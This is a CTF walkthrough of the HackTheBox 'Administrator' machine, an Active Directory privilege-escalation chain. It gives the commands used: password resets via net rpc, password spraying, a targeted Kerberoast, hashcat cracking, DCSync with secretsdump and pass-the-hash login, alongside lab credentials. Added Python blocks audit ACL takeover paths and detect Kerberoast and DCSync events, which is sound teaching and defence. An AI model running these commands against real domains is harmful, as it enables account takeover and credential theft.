Box Info

Setup

mkdir -p ~/ctf/HackTheBox/administrator/scans; cd ~/ctf/HackTheBox/administrator

IP Address: 10.10.11.42

echo "10.10.11.42 administrator.htb" | sudo tee -a /etc/hosts
10.10.11.42 administrator.htb


Enumeration

nmap -sC -sV -Pn -p- administrator.htb -oN scans/nmap -vv

nmap -sC -sV -p- -T5 -vv --min-rate 2500 -oN scans/nmap_2 administrator.htb

# nmap findings
Host is up, received user-set (0.076s latency).
Scanned at 2025-06-01 09:50:51 IST for 105s
Not shown: 65509 closed tcp ports (conn-refused)
PORT      STATE SERVICE       REASON  VERSION
21/tcp    open  ftp           syn-ack Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2025-06-01 11:00:09Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
47001/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack Microsoft Windows RPC
56890/tcp open  msrpc         syn-ack Microsoft Windows RPC
60272/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
60283/tcp open  msrpc         syn-ack Microsoft Windows RPC
60288/tcp open  msrpc         syn-ack Microsoft Windows RPC
60291/tcp open  msrpc         syn-ack Microsoft Windows RPC
60310/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

As this is an assumed-breach challenge, we start with credentials: Username: Olivia, Password: ichliebedich

Collecting BloodHound data with rusthound:

rusthound -d administrator.htb -u 'Olivia' -p 'ichliebedich' -o 'bloodhound' -z -i 10.10.11.42


Here we see that the olivia user is a member of Remote Management Users, so we can use WinRM to get a shell.

Olivia has outbound GenericAll rights on Michael.

Michael has the right to change Benjamin's password.

Using:

net rpc password "michael" "Password@123" -U "administrator.htb"/'Olivia'%'ichliebedich' -S 10.10.11.42

net rpc password "benjamin" "Password@123" -U "administrator.htb"/'michael'%'Password@123' -S 10.10.11.42
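Added example (not rusthound or BloodHound output): a small audit that turns a BloodHound-style edge list into a control graph and searches it for takeover paths, the way a defender would review the rights abused above. EDGES is constructed to mirror the relationships on this box, including the emily to ethan and ethan to domain edges found later in the writeup; the FTP backup pivot from benjamin to emily is a credential leak, not an ACL edge, so an ACL audit alone does not see it.

```python
"""Build a control graph from a BloodHound-style edge list and search it for
takeover paths, as a defender reviewing the rights this writeup abuses would.
Added example, not tool output; EDGES is constructed to mirror this box."""
from collections import deque

# Rights that let the holder take over or act as the target principal.
TAKEOVER_RIGHTS = {"GenericAll", "GenericWrite", "ForceChangePassword",
                   "WriteDacl", "WriteOwner", "Owns", "AllExtendedRights"}
# Rights on the domain object that permit DCSync replication.
DCSYNC_RIGHTS = {"GetChanges", "GetChangesAll"}

# Constructed edges: (source principal, BloodHound edge name, target).
EDGES = [
    ("OLIVIA", "MemberOf", "REMOTE MANAGEMENT USERS"),  # access, not control
    ("OLIVIA", "GenericAll", "MICHAEL"),
    ("MICHAEL", "ForceChangePassword", "BENJAMIN"),
    ("EMILY", "GenericWrite", "ETHAN"),
    ("ETHAN", "GetChanges", "ADMINISTRATOR.HTB"),
    ("ETHAN", "GetChangesAll", "ADMINISTRATOR.HTB"),
]

def control_graph(edges):
    """Adjacency list keeping only edges that transfer control."""
    graph = {}
    for src, right, dst in edges:
        if right in TAKEOVER_RIGHTS or right in DCSYNC_RIGHTS:
            graph.setdefault(src, []).append((right, dst))
    return graph

def find_path(edges, start, goal):
    """BFS for the shortest chain of control edges from start to goal;
    returns [node, '-Right->', node, ...] or None if goal is unreachable."""
    graph = control_graph(edges)
    queue, seen = deque([(start, [start])]), {start}
    while queue:
        node, path = queue.popleft()
        if node == goal:
            return path
        for right, nxt in graph.get(node, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, path + [f"-{right}->", nxt]))
    return None

def principals_reaching(edges, goal):
    """Every principal with a control path to goal: the defender's review list."""
    nodes = {n for src, _, dst in edges for n in (src, dst)}
    return sorted(n for n in nodes if n != goal and find_path(edges, n, goal))

if __name__ == "__main__":
    print(find_path(EDGES, "OLIVIA", "BENJAMIN"))
    print(principals_reaching(EDGES, "ADMINISTRATOR.HTB"))
```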


Since the FTP port was open, we checked with CrackMapExec and found that benjamin has FTP access.


Backup.psafe3 is a Password Safe v3 database. Following John's guide, we extract the hash and crack it with john.


Unlocking the password file gave us 3 passwords; we use cme to spray them against all users.

Found emily:UX********************

Checking BloodHound, we see that emily has GenericWrite on ethan.


Using targetedKerberoast.py we get a krb5tgs hash for ethan (after syncing our clock to the DC, since Kerberos rejects requests with too much time skew):

sudo timedatectl set-ntp off

sudo rdate -n 10.10.11.42

python3 targetedKerberoast.py -v -d 'administrator.htb' --dc-ip 10.10.11.42 -u 'emily' -p 'UX********************'


$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$dbcf0f6c96a09a4f61a178a331005a62$f254d30973e9bc2ffafd5da012262c27d3bfe652d55daac84964d355a67e4cccc776050fc48ed899e291e6d992833bac8998ed56e680ab5dee4a7bab4605e46571ce3f094657e786********************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************

We have WinRM access as the emily user.


Using WinRM we get the user flag.



User Flag

Location: C:\Users\emily\Desktop\user.txt | Flag: 2b5********************

Privilege Escalation

Using the krb5tgs hash for ethan obtained above, we crack it with hashcat:

hashcat -m 13100 ethan.hash /usr/share/wordlists/rockyou.txt


We get credentials: ethan:li********************

Checking BloodHound for ethan, we see that ethan has outbound control on Administrator.


A DCSync attack is possible because ethan holds the GetChangesAll right; to exploit this we use secretsdump.py.


Administrator:3dc********************
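Detection logic for the two AD abuses in this writeup, the targeted Kerberoast of ethan above and the DCSync here, as an added example that is not part of the writeup: EVENTS are constructed dicts carrying the relevant fields of Security events 5136, 4769 and 4662, and DC_ACCOUNTS is an assumed allow-list of domain controller accounts.

```python
"""Detect the targeted Kerberoast (SPN written onto a user, then an RC4 TGS
request for it) and the DCSync (a non-DC account exercising replication
rights) from Windows Security events. Added example, not from the writeup;
EVENTS are constructed dicts with the relevant 5136/4769/4662 fields."""

# Control-access GUIDs that show up in the 4662 Properties field on DCSync.
REPL_GUIDS = {"1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
              "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All"}
DC_ACCOUNTS = {"DC$"}  # assumed allow-list of DC machine accounts that may replicate

def detect_dcsync(events):
    """(account, [rights]) for each 4662 where a principal outside the DC
    allow-list touched a replication control-access GUID."""
    hits = []
    for e in events:
        if e["EventID"] != 4662 or e["SubjectUserName"] in DC_ACCOUNTS:
            continue
        rights = [n for g, n in REPL_GUIDS.items() if g in e["Properties"].lower()]
        if rights:
            hits.append((e["SubjectUserName"], rights))
    return hits

def detect_targeted_kerberoast(events, window=3600):
    """(actor, victim) pairs: a 5136 that set servicePrincipalName on a user,
    then a 4769 for that account with RC4 (0x17) within `window` seconds."""
    spn_writes, hits = {}, []
    for e in sorted(events, key=lambda x: x["Time"]):
        if e["EventID"] == 5136 and e["AttributeLDAPDisplayName"] == "servicePrincipalName":
            victim = e["ObjectDN"].split(",")[0].removeprefix("CN=").lower()
            spn_writes[victim] = (e["Time"], e["SubjectUserName"])
        elif e["EventID"] == 4769 and e["TicketEncryptionType"] == "0x17":
            svc = e["ServiceName"].rstrip("$").lower()
            if svc in spn_writes and e["Time"] - spn_writes[svc][0] <= window:
                hits.append((spn_writes[svc][1], svc))
    return hits

# Constructed sample events mirroring the writeup's chain (not real logs).
EVENTS = [
    {"EventID": 5136, "Time": 100, "SubjectUserName": "emily", "AttributeLDAPDisplayName": "servicePrincipalName",
     "ObjectDN": "CN=ethan,CN=Users,DC=administrator,DC=htb"},
    {"EventID": 4769, "Time": 130, "ServiceName": "ethan", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "Time": 140, "ServiceName": "DC$", "TicketEncryptionType": "0x12"},  # ordinary AES request
    {"EventID": 4662, "Time": 200, "SubjectUserName": "DC$", "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "Time": 210, "SubjectUserName": "ethan",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]

if __name__ == "__main__":
    print(detect_targeted_kerberoast(EVENTS))
    print(detect_dcsync(EVENTS))
```

The RC4 downgrade is what makes the ticket crackable offline, so a 4769 with 0x17 for a user account that only recently gained an SPN is the highest-signal pairing; DC machine accounts replicate legitimately, which is why the allow-list matters.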

Logging in using WinRM:

evil-winrm -i 10.10.11.42 -u 'Administrator' -H '3dc********************'



Root Flag

Location: C:\Users\Administrator\Desktop\root.txt | Flag: 877********************